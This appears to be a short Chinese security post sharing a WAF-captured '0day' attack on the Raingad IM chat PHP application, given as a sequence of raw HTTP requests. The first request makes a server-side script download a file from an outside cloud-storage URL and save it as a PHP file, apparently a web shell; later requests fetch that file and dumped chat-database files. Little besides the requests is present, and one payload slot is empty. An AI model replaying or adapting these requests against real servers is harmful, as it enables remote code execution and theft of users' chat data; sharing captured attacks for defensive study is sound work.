Raingad/IM即时聊天-php 0day WAF捕捉

大家自行研究 下面是几步请求载荷

载荷1

GET /static/pdfjs/web/cmaps/map.php?token=a8d3d543d5b7ac121797f021033830c3&type=postfc&id=https://mysakichj0.oss-ap-southeast-1.aliyuncs.com/script/aa.jpg&dir=aa.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: application/json, text/plain, */*
Connection: keep-alive
Sec-Ch-Ua: “Google Chrome”;v=”117″, “Not;A=Brand”;v=”8″, “Chromium”;v=”117″
Accept-Language: rw
Sec-Ch-Ua-Mobile: ?0
Client: app
Sec-Ch-Ua-Platform: “Windows”
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty

载荷2

载荷3

GET /static/pdfjs/web/cmaps/bb.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: application/json, text/plain, */*
Connection: keep-alive
Sec-Ch-Ua: “Google Chrome”;v=”117″, “Not;A=Brand”;v=”8″, “Chromium”;v=”117″
Accept-Language: rw
Sec-Ch-Ua-Mobile: ?0
Client: app
Sec-Ch-Ua-Platform: “Windows”
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty

载荷4

GET /static/pdfjs/web/cmaps/liaotianmysqldb.sql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: application/json, text/plain, */*
Connection: keep-alive
Sec-Ch-Ua: “Google Chrome”;v=”117″, “Not;A=Brand”;v=”8″, “Chromium”;v=”117″
Accept-Language: rw
Sec-Ch-Ua-Mobile: ?0
Client: app
Sec-Ch-Ua-Platform: “Windows”
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty

载荷5

GET /static/pdfjs/web/cmaps/liaotianmysqldb.txt HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: application/json, text/plain, */*
Connection: keep-alive
Sec-Ch-Ua: “Google Chrome”;v=”117″, “Not;A=Brand”;v=”8″, “Chromium”;v=”117″
Accept-Language: rw
Sec-Ch-Ua-Mobile: ?0
Client: app
Sec-Ch-Ua-Platform: “Windows”
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty

攻击者IP：